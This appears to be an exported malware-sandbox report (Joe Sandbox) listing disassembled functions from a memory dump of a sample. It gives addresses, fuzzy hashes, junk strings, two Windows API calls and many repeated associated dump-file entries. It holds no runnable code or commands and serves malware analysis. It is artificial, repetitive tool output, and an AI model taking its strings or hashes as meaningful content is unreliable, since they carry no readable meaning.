Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 3ccafde9dc7febab0991ca093fb0546f9150b83ec36bb0e0e041d2899e7716f5
Instruction ID: de79274782890ab6157e29351952b5b57f49d752b180212f29ec8ae429d0a281
Opcode Fuzzy Hash: 3ccafde9dc7febab0991ca093fb0546f9150b83ec36bb0e0e041d2899e7716f5
Instruction Fuzzy Hash: BC110670200208AFDB01CF64EC85FAA33A9AF89305F109448FD1A9B260DB35E849EB60

Function 00710FE7 Relevance: 5.4, Strings: 3, Instructions: 1620COMMON

Download Yara Rule

Strings

JYW, xrefs: 007122C1
Lzo, xrefs: 00711BAF
{8N;, xrefs: 00712022

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: JYW$Lzo${8N;
API String ID: 0-994806674
Opcode ID: 233c322cd3ad66bf50a1e456a0ce5afd71e323284bb821781bba7318fd459dad
Instruction ID: c9a4c802e5d443e465dabfdecc6b1c8dd461f515f5af04bbe2dd2cbf5c97ae8d
Opcode Fuzzy Hash: 233c322cd3ad66bf50a1e456a0ce5afd71e323284bb821781bba7318fd459dad
Instruction Fuzzy Hash: B4B2F6F360C2049FE304AE2DEC8567AFBE9EF94720F1A493DE6C4C3744E67598058696

Function 00353720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0035E118,00000000,00000001,0035E108,00000000), ref: 00353758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003537B0

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: d82470b241de5d09396da9ad92e93decb5b990685338eee1db3253df3faa8f10
Instruction ID: bef2c9eb68e244717e77a2f13ec893a6822debd0c548252a8027279bbf5644ab
Opcode Fuzzy Hash: d82470b241de5d09396da9ad92e93decb5b990685338eee1db3253df3faa8f10
Instruction Fuzzy Hash: E941F971A00A189FDB24DB58CC94F9BB7B4BB48702F4051D8EA08EB2E0D7716E89CF50

Function 0070551C Relevance: 4.2, Strings: 2, Instructions: 1677COMMON

Download Yara Rule

Strings

Kp<, xrefs: 00705BA3
>!{/, xrefs: 00706903

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: >!{/$Kp<
API String ID: 0-2046940980
Opcode ID: bb13674186ee151e54226382fb35aa709d2ee041d1c67c8e63459f639ff6367f
Instruction ID: 890ed26c73ec3258d02283d49c5e9a21b804ea09e668017467e0eceec9ef795b
Opcode Fuzzy Hash: bb13674186ee151e54226382fb35aa709d2ee041d1c67c8e63459f639ff6367f
Instruction Fuzzy Hash: 9BB218F3A0C2049FD304AE2DEC8577ABBE9EF94720F1A453DEAC4C3744EA3559058696

Function 00707036 Relevance: 4.1, Strings: 2, Instructions: 1596COMMON

Download Yara Rule

Strings

q%~k, xrefs: 007071C6
hCo, xrefs: 0070770C

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: hCo$q%~k
API String ID: 0-2744035490
Opcode ID: 535d1439f318f04e4a93174747acdf875e39f35c22b8d5af022c23345fc3aa7c
Instruction ID: b88960f5dd0fb4490933249c2f93856cca98bf6badae8c0124d051e30b38b847
Opcode Fuzzy Hash: 535d1439f318f04e4a93174747acdf875e39f35c22b8d5af022c23345fc3aa7c
Instruction Fuzzy Hash: E4B205F360C204AFE3046E2DEC8567ABBE9EF94720F16493DE6C5C3744EA3558058697

Function 00634E07 Relevance: 2.6, Strings: 2, Instructions: 138COMMON

Download Yara Rule

Strings

{D?, xrefs: 00634F52
?{, xrefs: 00634F42

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: {D?$?{
API String ID: 0-2642688782
Opcode ID: 7ca226239c56040e6e1fb684ba2d5551951d0c4b6361a053590cfba11c534d66
Instruction ID: 32fa91412778d21e46f0de4886160031855ea4c18d521c83a354a9b8f743883f
Opcode Fuzzy Hash: 7ca226239c56040e6e1fb684ba2d5551951d0c4b6361a053590cfba11c534d66
Instruction Fuzzy Hash: 7B4179B3A283109BE3486E2CED9536AB7D6DBC4720F1F453D96C4D7B80DD7998014286

Function 00653411 Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

w{w, xrefs: 00653600

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: w{w
API String ID: 0-2271001593
Opcode ID: 17b36488a318cd256b01cff5c75f549163a10f1dd8ccfed9861f6abd4dd63303
Instruction ID: b39f06d0bb1cffdc28a69684d78b0f2e3be29cf0178c746a4c1e8901442c0b1b
Opcode Fuzzy Hash: 17b36488a318cd256b01cff5c75f549163a10f1dd8ccfed9861f6abd4dd63303
Instruction Fuzzy Hash: 0E6119F3A08614AFE3409E1DDC8576AB7D9EF94760F1A453EEAC8C3740E9769C018792

Function 006929B9 Relevance: 1.4, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

~"{, xrefs: 00692A4C

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ~"{
API String ID: 0-3980992884
Opcode ID: a4833643abf7bd10a83a748c5f3ac257a5b5887519b1044ead0f78ae1d3e2700
Instruction ID: 02af0b303916b054bc61a4f1a58f40eb52849a715aca0393cac055ecdcf601cd
Opcode Fuzzy Hash: a4833643abf7bd10a83a748c5f3ac257a5b5887519b1044ead0f78ae1d3e2700
Instruction Fuzzy Hash: 165117F3A0C2109BE3086E29DC457BAB7D6EB90320F1B453DDB8997780E97D58028686

Function 005F7A77 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac2f9616c88677124dc057ef1b549fe3339752557c69c86eb3bc5e3ccb604049
Instruction ID: 58e0917ac7908557304297773b0ad6a2b8dbb045d8149c8d60bfc4381d818b58
Opcode Fuzzy Hash: ac2f9616c88677124dc057ef1b549fe3339752557c69c86eb3bc5e3ccb604049
Instruction Fuzzy Hash: 565101B3E082101FF3085929EC4976B76DADBC4320F2B823DEA58E77C4E9799C064295

Function 0060412D Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
